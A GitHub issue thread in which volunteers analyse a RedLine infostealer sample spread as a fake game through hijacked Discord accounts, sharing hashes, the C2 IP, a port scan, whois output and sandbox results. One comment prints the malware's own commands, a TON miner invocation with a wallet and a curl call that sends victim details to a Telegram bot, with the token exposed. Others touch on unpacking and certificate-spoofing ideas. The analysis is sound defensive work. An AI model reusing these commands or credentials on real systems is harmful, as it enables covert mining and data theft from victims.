### ISSUE TITLE
Actual in depth investigation

### ISSUE THREAD

**Issue by Realswitzer** [d1anes/d1xne#14]
tl;dr redline stealer
VirusTotal results:
```
M5_Game_v3.rar: https://www.virustotal.com/gui/file/b8d3a1332b9237b815e81c913b6e02958af581fa02d75c825e77dc9f9c6a2b63/detection
  Contents:
    M5_Game_v3.exe: https://www.virustotal.com/gui/file/0417318e99ec3e21b5f200a682d97603dd1cce4a0c827c3e3c234e92b11ed7e9/detection
```

Crowdsourced Sigma Rules:
```
4 matches for rule File deletion via CMD (via cmdline) by Ariel Millahuel from SOC Prime Threat Detection Marketplace
Detects "cmd" utilization to self-delete files in some critical Windows destinations.
1 match for rule Sysmon Configuration Change by frack113 from Sigma Integrated Rule Set (GitHub)
Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration
28 matches for rule Stop Windows Service by Jakob Weinzettl, oscd.community from Sigma Integrated Rule Set (GitHub)
Detects a windows service to be stopped
```

Contacted IPs:
```
193.106.191.100 6/90 (Russia): https://www.virustotal.com/gui/ip-address/193.106.191.100
```

Under the community tab, user [ThreatFox] made a collection about Redline which involved the contacted IP.
Using [any.run](any.run) I was able to check it out: https://app.any.run/tasks/2fe74959-3df1-44fc-994e-b02cff21229f
Checking out the connections, I was able to find the IP which is marked malicious and has comparatively high upload.
<img width="953" alt="Screen Shot 2022-02-12 at 1 29 43 PM" src="https://user-images.githubusercontent.com/39711351/153725573-be971986-3746-4ef1-9ab9-3f0955b9efae.png">
It also shows traditional infostealer activity like reading cookies. Using this, it seems safe to assume that all of the accounts posting this from Discord were affected accounts.

I could go further in but simply it's not worth it.

**Comment by Realswitzer** [comment]
Also found from a piracy server.
![Screen Shot 2022-02-12 at 1 45 09 PM](https://user-images.githubusercontent.com/39711351/153726069-a9ae501b-28e7-46ee-9709-6c71b36566d6.png)

**Comment by Realswitzer** [comment]
Confirms my suspicion it's victims and not just a ton of alts.

**Comment by IlluminatiFish** [comment]
> Confirms my suspicion it's victims and not just a ton of alts.

its how the cycle works with redline at least been following it since June of 2021

**Comment by IlluminatiFish** [comment]
> tl;dr redline stealer VirusTotal results:
> 
> ```
> M5_Game_v3.rar: https://www.virustotal.com/gui/file/b8d3a1332b9237b815e81c913b6e02958af581fa02d75c825e77dc9f9c6a2b63/detection
>   Contents:
>     M5_Game_v3.exe: https://www.virustotal.com/gui/file/0417318e99ec3e21b5f200a682d97603dd1cce4a0c827c3e3c234e92b11ed7e9/detection
> ```
> 
> Crowdsourced Sigma Rules:
> 
> ```
> 4 matches for rule File deletion via CMD (via cmdline) by Ariel Millahuel from SOC Prime Threat Detection Marketplace
> Detects "cmd" utilization to self-delete files in some critical Windows destinations.
> 1 match for rule Sysmon Configuration Change by frack113 from Sigma Integrated Rule Set (GitHub)
> Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration
> 28 matches for rule Stop Windows Service by Jakob Weinzettl, oscd.community from Sigma Integrated Rule Set (GitHub)
> Detects a windows service to be stopped
> ```
> 
> Contacted IPs:
> 
> ```
> 193.106.191.100 6/90 (Russia): https://www.virustotal.com/gui/ip-address/193.106.191.100
> ```
> 
> Under the community tab, user [ThreatFox] made a collection about Redline which involved the contacted IP. Using [any.run](any.run) I was able to check it out: https://app.any.run/tasks/2fe74959-3df1-44fc-994e-b02cff21229f Checking out the connections, I was able to find the IP which is marked malicious and has comparatively high upload. <img alt="Screen Shot 2022-02-12 at 1 29 43 PM" width="953" src="https://user-images.githubusercontent.com/39711351/153725573-be971986-3746-4ef1-9ab9-3f0955b9efae.png"> It also shows traditional infostealer activity like reading cookies. Using this, it seems safe to assume that all of the accounts posting this from Discord were affected accounts.
> 
> I could go further in but simply it's not worth it.

https://threatfox.abuse.ch/ioc/379318/ if anyone was wondering

**Comment by yeetmydog** [comment]
> Confirms my suspicion it's victims and not just a ton of alts.
Yep, the account that it was posted from was definitely hacked and also had mutual friends on it + linked accounts. That sucks.

**Comment by Realswitzer** [comment]
> its how the cycle works, with redline at least, been following it since June of 2021

Just saw this sample and wanted to investigate, good to know that it's been around for a while.
> https://threatfox.abuse.ch/ioc/379318/ if anyone was wondering

Thanks, the collection part makes a lot more sense.

**Comment by IlluminatiFish** [comment]
> > its how the cycle works, with redline at least, been following it since June of 2021
> 
> Just saw this sample and wanted to investigate, good to know that it's been around for a while.
> 
> > https://threatfox.abuse.ch/ioc/379318/ if anyone was wondering
> 
> Thanks, the collection part makes a lot more sense.

the stealer itself appeared in march of 2020

**Comment by Realswitzer** [comment]
> the stealer itself appeared in march of 2020, i only got to tracking it in june of 2021 once i saw the amount of phishing on discord and surprise surprise they're interlinked

Guess I should have connected the dots between the amount of nitro phishing URLs popping up and an infostealer. I had some suspicion about it being a generic fake login page, as I never checked out any of the sites, but didn't really think it would be an infostealer like, well, how it is revealed.

**Comment by IlluminatiFish** [comment]
> > the stealer itself appeared in march of 2020, i only got to tracking it in june of 2021 once i saw the amount of phishing on discord and surprise surprise they're interlinked
> 
> Guess I should have connected the dots between the amount of nitro phishing URLs popping up and an infostealer. I had some suspicion about it being a generic fake login page, as I never checked out any of the sites, but didn't really think it would be an infostealer like, well, how it is revealed.

fair enough

**Comment by yeetmydog** [comment]
> Thanks for this Accounts on discord are sending a direct file link to the archive saying it's a game, and they want people to test it. ![image](https://user-images.githubusercontent.com/48489278/153726014-2bbc415c-2473-4dfa-b26f-04a63348eaa8.png) For everyone that reads this, stay safe, lol.

I actually just got in contact with the person who got their account hacked, and they are trying to take control of their account again. I really hope they get it back, they had no idea they even got hacked.

**Comment by eugeniodevv** [comment]
Open ports:

Discovered open port 3389/tcp on 193.106.191.100
Discovered open port 5112/tcp on 193.106.191.100
Discovered open port 49668/tcp on 193.106.191.100
Discovered open port 135/tcp on 193.106.191.100
Discovered open port 445/tcp on 193.106.191.100
Discovered open port 7766/tcp on 193.106.191.100
Discovered open port 139/tcp on 193.106.191.100
Discovered open port 49670/tcp on 193.106.191.100
Discovered open port 49665/tcp on 193.106.191.100
Discovered open port 49669/tcp on 193.106.191.100
Discovered open port 49676/tcp on 193.106.191.100
Discovered open port 49666/tcp on 193.106.191.100
Discovered open port 47001/tcp on 193.106.191.100
Discovered open port 5985/tcp on 193.106.191.100
Discovered open port 49667/tcp on 193.106.191.100
Discovered open port 49664/tcp on 193.106.191.100

Seems like an offshore RDP

**Comment by yeetmydog** [comment]
I ran a whois query on that IP, and apparently it's linked to some weird company called Kanzas LLC? With one of it's addresses being "RUSSIAN FEDERATION"??
![image](https://user-images.githubusercontent.com/48489278/153727075-06a31627-9145-4e3d-8f44-9079427c3f5e.png)

**Comment by Realswitzer** [comment]
```
switz@swotzterm cwd:~ $ whois 193.106.191.100
% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object

refer:        whois.ripe.net

inetnum:      193.0.0.0 - 193.255.255.255
organisation: RIPE NCC
status:       ALLOCATED

whois:        whois.ripe.net

changed:      1993-05
source:       IANA

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '193.106.191.0 - 193.106.191.255'

% Abuse contact for '193.106.191.0 - 193.106.191.255' is 'info@kanzas.msk.ru'

inetnum:        193.106.191.0 - 193.106.191.255
netname:        RU-KANZAS-20210430
country:        RU
org:            ORG-KL329-RIPE
admin-c:        NF3107-RIPE
tech-c:         NF3107-RIPE
status:         ALLOCATED PA
mnt-by:         lir-ru-kanzas-1-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      lir-ru-kanzas-1-MNT
mnt-routes:     lir-ru-kanzas-1-MNT
created:        2021-04-30T15:31:31Z
last-modified:  2021-04-30T15:31:31Z
source:         RIPE

organisation:   ORG-KL329-RIPE
org-name:       Kanzas LLC
org-type:       LIR
address:        ul. Ordzhonikidze, 1, pom. XV, kom. 5
address:        115419
address:        Moscow
address:        RUSSIAN FEDERATION
country:        RU
phone:          +7 495 1440753
admin-c:        NF3107-RIPE
tech-c:         NF3107-RIPE
abuse-c:        AR62996-RIPE
mnt-ref:        lir-ru-kanzas-1-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         lir-ru-kanzas-1-MNT
created:        2021-04-28T11:07:00Z
last-modified:  2021-08-18T08:33:32Z
source:         RIPE # Filtered

role:           Nikolay Frolov
address:        ul. Ordzhonikidze, 1, pom. XV, kom. 5
address:        115419
address:        Moscow
address:        RUSSIAN FEDERATION
phone:          +7 495 1440753
nic-hdl:        NF3107-RIPE
mnt-by:         lir-ru-kanzas-1-MNT
created:        2021-04-28T11:07:00Z
last-modified:  2021-04-28T11:07:00Z
source:         RIPE # Filtered

% Information related to '193.106.191.0/24AS59940'

route:          193.106.191.0/24
origin:         AS59940
mnt-by:         lir-ru-kanzas-1-MNT
created:        2021-07-22T14:12:16Z
last-modified:  2021-07-22T14:12:16Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.102.2 (BLAARKOP)
```
I assume the "RUSSIAN FEDERATION" part is referring to Russia. I can check and see if there's anything relating to Kanzas.

**Comment by AppeazeTheCheese** [comment]
I intercepted commands being ran by this program and this is what I found:

* This is definitely a cryptocurrency miner mining TON using the Whales pool 
  * `C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQBq1q3_HnFZB6F-owuWLV59J9-uBT3M1660Lr52sytnwupF`
* after starting this process, it is sending an API request to Telegram via CURL using a bot to direct message a user by the name of Retworez
  * `curl "https://api.telegram.org/bot5097867738:AAGqWiZLyhuZad2Gxw_ZDUjTmEdd_vbfI40/sendMessage?chat_id=2097201889&text=%F0%9F%99%88 New worker!%0AGPU: VirtualBox Graphics Adapter for Windows 8+%0AWorker Tag: IGS"`

**Comment by Jerem584** [comment]
do you guys need reverse engineering ?

**Comment by Jerem584** [comment]
> > do you guys need reverse engineering ?
> 
> I attempted to reverse engineer it but I don't recognize the file structure of the exe

what do you mean by that

**Comment by Jerem584** [comment]
sec directory isn't empty?

what bout a section list?

**Comment by AppeazeTheCheese** [comment]
> > > do you guys need reverse engineering ?
> > 
> > 
> > I attempted to reverse engineer it but I don't recognize the file structure of the exe
> 
> what do you mean by that

I mean I tried figuring out what it was made with by opening it in a hex editor and 7zip but i dont recognize the strucutre

**Comment by Jerem584** [comment]
i see, they **should** use a winverifytrust hijack to make the fake nvidia certificate to appear VALID. 

tho, it need to run at least first. (poc)

**Comment by Akiyamov** [comment]
>     * after starting this process, it is sending an API request to Telegram via CURL using a bot to direct message a user by the name of Retworez
That nickname appears here https://lolz.guru/threads/3486602. social engineering forum. on that page also appears name playar. go to that page on forum and there is some kind of team which give away that software or something like this. also they mention in screenshots that *build already crypted*

**Comment by Jerem584** [comment]
> > ```
> > * after starting this process, it is sending an API request to Telegram via CURL using a bot to direct message a user by the name of Retworez
> > ```
> 
> That nickname appears here https://lolz.guru/threads/3486602. social engineering forum. on that page also appears name playar. go to that page on forum and there is some kind of team which give away that software or something like this. also they mention in screenshots that _build already crypted_

well, lolz.guru isn't a S/E forum..

**Comment by IlluminatiFish** [comment]
> Open ports:
> 
> Discovered open port 3389/tcp on 193.106.191.100 Discovered open port 5112/tcp on 193.106.191.100 Discovered open port 49668/tcp on 193.106.191.100 Discovered open port 135/tcp on 193.106.191.100 Discovered open port 445/tcp on 193.106.191.100 Discovered open port 7766/tcp on 193.106.191.100 Discovered open port 139/tcp on 193.106.191.100 Discovered open port 49670/tcp on 193.106.191.100 Discovered open port 49665/tcp on 193.106.191.100 Discovered open port 49669/tcp on 193.106.191.100 Discovered open port 49676/tcp on 193.106.191.100 Discovered open port 49666/tcp on 193.106.191.100 Discovered open port 47001/tcp on 193.106.191.100 Discovered open port 5985/tcp on 193.106.191.100 Discovered open port 49667/tcp on 193.106.191.100 Discovered open port 49664/tcp on 193.106.191.100
> 
> Seems like an offshore RDP

its just a generic redline c2 server nothing too wild

**Comment by UJ1st** [comment]
I found his crypto wallet: https://tonwhales.com/explorer/address/EQBq1q3_HnFZB6F-owuWLV59J9-uBT3M1660Lr52sytnwupF
He started mining about a month ago.

**Comment by IlluminatiFish** [comment]
> > > > do you guys need reverse engineering ?
> > > 
> > > 
> > > I attempted to reverse engineer it but I don't recognize the file structure of the exe
> > 
> > 
> > what do you mean by that
> 
> I mean I tried figuring out what it was made with by opening it in a hex editor and 7zip but I don't recognize the structure

its made with C# and most likely packed

**Comment by IlluminatiFish** [comment]
> I found his crypto wallet: https://tonwhales.com/explorer/address/EQBq1q3_HnFZB6F-owuWLV59J9-uBT3M1660Lr52sytnwupF He started mining about a month ago.

I too have seen this in some redline samples (the same address to be specific),  it is dropped by redline as an extra way to get the actor money by using the vicitm's machine i suppose

**Comment by IlluminatiFish** [comment]
the source code for redline stealer has been leaked hence why the uptick in its distribution used to be a MaaS for 100-150 USD

**Comment by Jerem584** [comment]
> > > > > > do you guys need reverse engineering ?
> > > > > 
> > > > > 
> > > > > I attempted to reverse engineer it but I don't recognize the file structure of the exe
> > > > 
> > > > 
> > > > what do you mean by that
> > > 
> > > 
> > > I mean I tried figuring out what it was made with by opening it in a hex editor and 7zip but I don't recognize the structure
> > 
> > 
> > its made with C# and most likely packed
> 
> recent samples I've seen ITW have been using ASProtectm, if that helps the reverse engineering side of things

ASProtectm? never heard

**Comment by IlluminatiFish** [comment]
my bad I had a typo its ASProtect

**Comment by Realswitzer** [comment]
I assume we can't try using anything to easily reverse engineer it, like [unpacked files](https://www.anti-reversing.com/asprotect-epic-fail/) since there's only one file. [pstolarz/asprext](https://github.com/pstolarz/asprext) might be helpful although unsure if it'll work.

**Comment by Realswitzer** [comment]
Not sure what version but if its 1.3x-2.3 then [this](https://github.com/dubuqingfeng/ollydbg-script/blob/master/ASProtect/ASProtect%201.3x%20-%202.xx%20Unpacker%20v1.12SC.txt) might also work, but unable to tell if it's designed for unpacking a specific app or if it unpacks generally.

**Comment by DrNostalgia** [comment]
godspeed

**Comment by MephresGH** [comment]
Huge thanks for making people aware of this issue. I have sent a report to the Github Team so they can further take action.

**Comment by Jerem584** [comment]
> Huge thanks for making people aware of this issue. I have sent a report to the Github Team so they can further take action.

it would be stupid for github to delete that repo, since 

1. it won't stop them from creating another github
2. it will remove that issue and so the research and the warnings...

**Comment by IlluminatiFish** [comment]
> > Huge thanks for making people aware of this issue. I have sent a report to the Github Team so they can further take action.
> 
> it would be stupid for github to delete that repo, since
> 
>     1. it won't stop them from creating another github
> 
>     2. it will remove that issue and so the research and the warnings...

I'm not going to lie Redline itself has been going strong for well over a year now I dont think running them off github or gitlab will affect them in anyway they'll just use another free file host

**Comment by Realswitzer** [comment]
> it will remove that issue and so the research and the warnings...

Most we can really do is copy everything and maybe move to another repo. I guess the possibility of a Discord/Matrix server is there but would be highly unorganized, and would probably be made by a random person.

**Comment by IlluminatiFish** [comment]
> > it will remove that issue and so the research and the warnings...
> 
> Most we can really do is copy everything and maybe move to another repo. I guess the possibility of a Discord/Matrix server is there but would be highly unorganized, and would probably be made by a random person.

I have a sort of repo describing redline's delivery and execution characteristics but not sure if thats enough help haha

**Comment by MephresGH** [comment]
> > Huge thanks for making people aware of this issue. I have sent a report to the Github Team so they can further take action.
> 
> it would be stupid for github to delete that repo, since
> 
>     1. it won't stop them from creating another github
> 
>     2. it will remove that issue and so the research and the warnings...

That's actually true. My bad.

**Comment by Jerem584** [comment]
https://github.com/Jerem584/Malware-Research/issues/1

**Comment by Realswitzer** [comment]
I have a Discord although it's pretty standard and doesn't have anything. I also don't know the best way to run a server so I probably should not host it.

**Comment by Realswitzer** [comment]
I'll clone the issue though, so for wherever the server is we can use the research from here.

**Comment by Jerem584** [comment]
> I'll clone the issue though, so for wherever the server is we can use the research from here.

clone it to my issue, discord will be investigation, and whatever we post on the issue will be research result

**Comment by crisis360** [comment]
надеюсь вы разберётесь ,оно и в россии  заражает аккаунты пользователей
